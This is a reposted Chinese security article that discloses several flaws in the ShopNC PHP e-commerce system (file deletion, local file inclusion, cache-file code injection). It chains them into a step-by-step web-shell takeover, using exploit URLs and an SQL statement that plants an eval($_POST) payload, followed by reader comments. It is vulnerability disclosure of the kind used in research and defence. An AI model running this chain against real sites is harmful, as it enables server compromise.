CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

shopnc

2017年5月22日 949点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

电子商务系统ShopNC多个漏洞(可暴力 getshell)

Yaseng2014-03-11+6共406704人围观 ,发现 17 个不明物体WEB安全漏洞

前言

ShopNC是一款S是网城创想公司旗下服务于企业客户的电子商务系统,基于PHP5技术采用MVC 模式开发,本文介绍了shopnc多个漏洞结合,可getshell有点暴力-_-

任意文件删除

文件 control\store.php 1438 行 (还有几个同样的地方,新版已修复)

........
$model_upload = Model('upload');
        $file_info = $model_upload->getOneUpload(intval($_GET['file_id']));
        if(!$file_info){
            @unlink(ATTACH_SLIDE.DS.$_GET['img_src']);
        }else{
 
........

本地文件包含

文件 /framework/core/base.php 71行

$act_file = realpath( BasePath.DS."control".DS.$_GET['act'].".php" );
    }
    if ( is_file( $act_file ) )
    {
        require( $act_file );
        $class_name = $_GET['act']."Control";
        if ( class_exists( $class_name ) )

后台更新缓存写shell

文件 model/adv_model.php 416 行

/**
     * 更新一条广告缓存
     *
     * @param unknown_type $adv
     * @return unknown
     */
    public function makeAdvCache($adv){
        $lang   = Language::getLangContent();
        $tmp .= "<?php \r\n";
        $tmp .= "defined('InShopNC') or exit('Access Invalid!'); \r\n";
        if (is_numeric($adv) && $adv > 0){
 
            $condition['adv_id'] = $adv;
            $adv_info = $this->getList($condition);
            $adv = $adv_info['0'];
        }
    ..................................
                       $content = addslashes($v);
            $content = str_replace('$','\$',$content);
            //防止有$符号被解析成变量
            $tmp .= '$'.$k." = \"".$content."\"; \r\n";
        }
        //缓存文件存放位置及文件名
        $cache_file = BasePath.'/cache/adv/adv_'.$adv['adv_id'].'.cache.php';
        file_put_contents($cache_file,$tmp);

继续跟进getList函数

public function getList($condition=array(), $page='', $limit='', $orderby=''){
    $param  = array();
    $param['table'] = 'adv';
    $param['field'] = $condition['field']?$condition['field']:'*';
    $param['where'] = $this->getCondition($condition);
    if($orderby == ''){
        $param['order'] = 'slide_sort, adv_id desc';
    }else{
        $param['order'] = $orderby;
    }
    $param['limit'] = $limit;
    return Db::select($param,$page);
}

写文件时,从数据库中遍历key,跟value 未过滤key,key 可以从数据库读取,当有数据库可控时,即可写入任意文件.

ShopNc GetShell

结合以上三个漏洞,即可优雅的 getshell
流程

任意文件删除 => 重装 => 更改数据库 shopnc_adv 键值 =>更新广告缓存 =>getshell

具体步骤

1:http://www.xxx.com/index.php?act=store&op=dorp_img&file_id=16&img_src=/../../../install/lock

2:重装系统
3:进入MySQL  执行sql  ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL

4:进入后台 更新广告缓存  http://www.xxx.com/admin/index.php?act=adv&op=adv_edit&adv_id=14

5:连接shell   http://www.xxx.com/index.php?act=../cache/adv/adv_14.cache

Yaseng

Yaseng4 篇文章等级: 2级
|
|
  • 上一篇:利用Google爬虫DDoS任意网站
  • 下一篇:如何安全的存储用户的密码

这些评论亮了

  • yyyy3333回复
    3:进入MySQL 执行sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL
    ....库用户密码呢
    )20(亮了
  • m3回复
    @yyyy3333 可以重装系统了,当然数据库是自己的远程服务器,可控啊!
    )15(亮了
  • new回复
    太暴力了,不能轻点吗
    )14(亮了
  • yasengB回复
    其实我想问下楼主是在哪拖的开源代码的。
    )8(亮了
发表评论

已有 17 条评论

  • yyyy3333 2014-03-11回复1楼

    3:进入MySQL 执行sql ALTER TABLE `shopnc_adv` ADD `{eval($_POST[1])}` VARCHAR( 100 ) NOT NULL
    ….库用户密码呢

    亮了(20)
    • m3 2014-03-13回复

      @yyyy3333 可以重装系统了,当然数据库是自己的远程服务器,可控啊!

      亮了(15)
  • yyyy3333 2014-03-11回复2楼

    哦 哦 哦

    亮了(3)
  • Dreamb0y 2014-03-11回复3楼

    碉堡了···

    亮了(2)
  • new 2014-03-11回复4楼

    太暴力了,不能轻点吗

    亮了(14)
  • 阿波罗 2014-03-11回复5楼

    图片这么给力..都出血了..

    亮了(5)
  • netorgcom (4级) 2014-03-11回复6楼

    碉~~~~~~~堡~~

    亮了(2)
  • dashen 2014-03-11回复7楼

    重装系统?

    亮了(1)
  • swordonly (1级) 2014-03-11回复8楼

    320个赞!!!!

    亮了(3)
  • dqw3721 (1级) 2014-03-12回复9楼

    没有数据库密码什么都干不了吧。
    web服务器权限和数据库权限配置好了也不会有问题。

    亮了(2)
  • hellen 2014-03-12回复10楼

    这些洞,10年前我就瞄出来了 :cool:

    亮了(4)
  • 飞鱼还是鱼 (1级)dididi 2014-03-25回复11楼

    这也行 没屏蔽这个?

    亮了(3)
  • yasengB 2014-04-03回复12楼

    其实我想问下楼主是在哪拖的开源代码的。

    亮了(8)
  • s 2015-02-28回复13楼

    :mrgreen: :sad: :cool: :wink:

    亮了(4)
  • debuger 2016-01-06回复14楼

    通常来说 网站挂上去,都会把install目录删掉,第一步就不能执行成功~~

    亮了(2)
  • dayediyi 2016-06-02回复15楼

    我下载的源码就没你那些问题。shopnc.club

    亮了(2)
  • lounger 2016-09-18回复16楼

    :razz: 胖胖,我居然看到了你的文章,,我是不会告诉你还有任意上传的

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

Yaseng

Yaseng

看毛片 www.yaseng.me

4 篇文章2 条评论

相关阅读

  • 关于PHP代码审计和漏洞挖掘的一点思考
  • 乐蜂网高薪招聘白盒审计以及WEB安全高级工程师
  • 免费开源相册Piwigo
  • 电子商务系统ShopNC多个漏洞(可暴力 getshell)
  • XDCTF2015代码审计全解

特别推荐

关注我们 分享每日精选文章

不容错过

  • FB视频:纪录片《暗网》之勒索软件篇FB视频2016-04-02
  • 只用一个WiFi,渗透进企业全部内网360天巡实验室2016-06-22
  • 【原创连载小说】《杀手》第一章:网络杀手kill472017-03-18
  • 又是雅虎,又10亿账户泄露!论数据泄露谁与争锋孙毛毛2016-12-15

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0day

标签: 暂无
最后更新:2017年5月22日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me